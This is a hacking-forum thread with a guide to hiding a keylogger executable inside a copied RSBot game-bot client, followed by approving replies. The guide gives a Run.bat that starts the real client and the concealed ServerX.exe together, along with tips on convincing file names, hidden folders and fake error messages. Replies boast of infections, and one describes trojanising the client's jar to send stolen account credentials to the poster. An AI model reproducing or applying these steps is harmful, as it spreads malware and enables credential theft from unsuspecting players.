[GUIDE] What to actually do with your Server.

Neo_

Member
Reputation
0
Hey guys,

So, when I started off with all this "Hacking", I was fine up until I had made the key logger. However, I had absolutely no clue over what to do with the server after I'd made it.

Well, of course there was binding, but being a beginner, i wasn't exactly going to be able to do this over night. So I used what knowledge I had (And some help from a friend, I did this:

Step 1.

Go to Powerbot.org and download their client (click here for quick download).

Step 2.

Go to "My Documents" and copy the RSBot folder onto your desktop (So you can easily access it, but also so you can keep your own version).

Step 3.

Go into this new RSBot folder, and make a new Sub folder called "Data". Inside here, paste the most recent RSBot client, which you got from the download.

Step 4.

Get your server, call it whatever you want (For this example, we'll call the server "ServerX.exe", but I recommend a name which sounds convincing, such as "Precompiler", or "ScriptRunner"), and paste it into a reasonably concealed place, perhaps creating a few extra folders, with random names. For this example, the server will be in the folder "Cache".

Step 5.

Open up notepad, and in notepad put this text:

Code:
@echo off

START Data/Rsbot-231.jar
START Cache/ServerX.exe

Code:
START Data/Rsbot-231.jar
This starts up the RSBot client.

Code:
START Cache/ServerX.exe
This starts up your Server. If it is working properly, a cmd screen will flash up. Even if your victim notices that, it's too late for them :awe: . If you have put your server somewhere other than "Cache", then put that instead of Cache in the coding. It must be spelt EXACTLY the same as the folders you have put it in.

Save this as "Run.bat" into the RSBot copy on your desktop.


This works for anything. Instead of it being the RSBot client, you could use another program, and simply edit the Run.bat file to suit you!

Hope this helps a few people out who don't really know what to do :D

~Neo

Rate/Hate/Masturbate!!

P.S. I don't know if this is someone else's method, but if it is, please say and i'll give you credit. My friend simply told me about it a few months ago.
 
Reputation
0
Good thread buddy.
 

.Judgement

Onyx user!
Reputation
0
Pretty legit guide actually. It'll probably get a tonne of HQ infections.
Good job Neo.
 

Nestea

Onyx user!
Reputation
0
Sweet! I had no idea, to bad I gave up all this black hat stuff awhile ago. This would have been handy!

Good share.
 
Reputation
0
I remember creating a login cacher for RSBot, I replaced a .class inside the .jar. It sent the Rsbot_account.ini file + username/pass (decrypted) to my laptop where I held the Java client. Now I believe RSbot has changed the way the password can be viewed ect. Nether the less, another server can be created on where it decrypts the password on there computer and then sends the .txt to you.

This way was multi-os and undetectable by anti-virus's. Hmm... I wonder if I can find this on my old desktop and see if I can get it running again.
 

Neo_

Member
Reputation
0
Thanks guys. If you found the guide useful or whatever, feel free to rep :D
 

Marcus

Member
Reputation
0
How do i make one of these "servers" lol, I want to hack like this but erm. I don't know how. You should make a guide from scratch on how to do the whole process?
 
Reputation
0
Marcus said:
How do i make one of these "servers" lol, I want to hack like this but erm. I don't know how. You should make a guide from scratch on how to do the whole process?

It's not "hack" It's infect. And keyloggers are pretty straight forward.
 

Marcus

Member
Reputation
0
Mk, infecting. My face is red.. And I just found Kill Joys guide.
 

Neo_

Member
Reputation
0
Ninja said:
Thanks for this guide! I think I'm going to use it.

No problem. It's nice and simple for pretty much anyone to use/change to fit their needs.
 

Sal

Member
Reputation
0
Nice guide, but can't you just use a file binder for this?
 

shelboi

Onyx user!
Reputation
0
Wow sweet thanks finally something good to try ima see how much i can get by tonight:)
 

tu y tu mama

Onyx user!
Reputation
0
Nice.
I never thought of that, will be helpful if you are spreading a "modified RSBot client"
 

Neo_

Member
Reputation
0
SD8Z said:
Nice.
I never thought of that, will be helpful if you are spreading a "modified RSBot client"

Haha, yeah. You don't even need to put the file in, just give the user an error message or something. It fools a lot of people.

It can also be a regular RSBot client, just add an extra line of code to run the client and your server.
 
Top